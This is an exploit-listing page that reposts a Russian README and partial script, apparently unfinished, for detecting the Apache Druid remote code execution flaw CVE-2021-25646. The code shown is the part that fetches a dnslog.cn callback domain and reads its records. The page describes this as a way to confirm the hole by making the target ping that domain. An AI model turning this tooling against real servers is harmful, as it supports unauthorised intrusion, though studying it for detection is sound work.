Sploitus

Exploit for CVE-2021-25646

kitploit · 2026-08-27

Exploit Code

MARKDOWN44 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GIVEMEFIVW-CVE-2021-25646
# CVE-2021-25646 Apache Druid RCE-уязвимость Скрипт Wker

В разработке...

=====================================================================================

Прежде всего, спасибо мастеру Wker за удалённую помощь.

Цель написания скрипта — практика.

## Использование

Скрипт использует DNSLog для проверки. Если уязвимость существует, он автоматически получает URL dnslog и выполняет ping, выводя результат.

  * Перед использованием создайте файл dns.wker в каталоге `script\ATTACKUTILS`



root@kitploit:~
    
    
    #define dnsqian = Set-Cookie:[
    #define dnshou =  path=/
    #define re = "(.*?)"
    function DnsRef(cookie){
    	res = HttpGet("http://dnslog.cn/getrecords.php?t=0.3741317873165926",cookie.StrRN()."User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0");
    	r = StrRe(res[0],re);
    	if(GetArrayNum(r) >= 3){
    		return r[3];
    	}else{
    		return "";
    	}
    }
    function GetDomain(){
    	array r;
    	res = HttpGet("http://dnslog.cn/getdomain.php?t=0.16082432252184475","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0");
    	tmp = StrSplit(res[0],StrRN());
    	dns = tmp[0];
    	cookie = "Cookie: ".GettextMiddle(res[1],dnsqian,dnshou);
    	ArrayAddEle(r,dns);
    	ArrayAddEle(r,cookie);
    	return r;
    }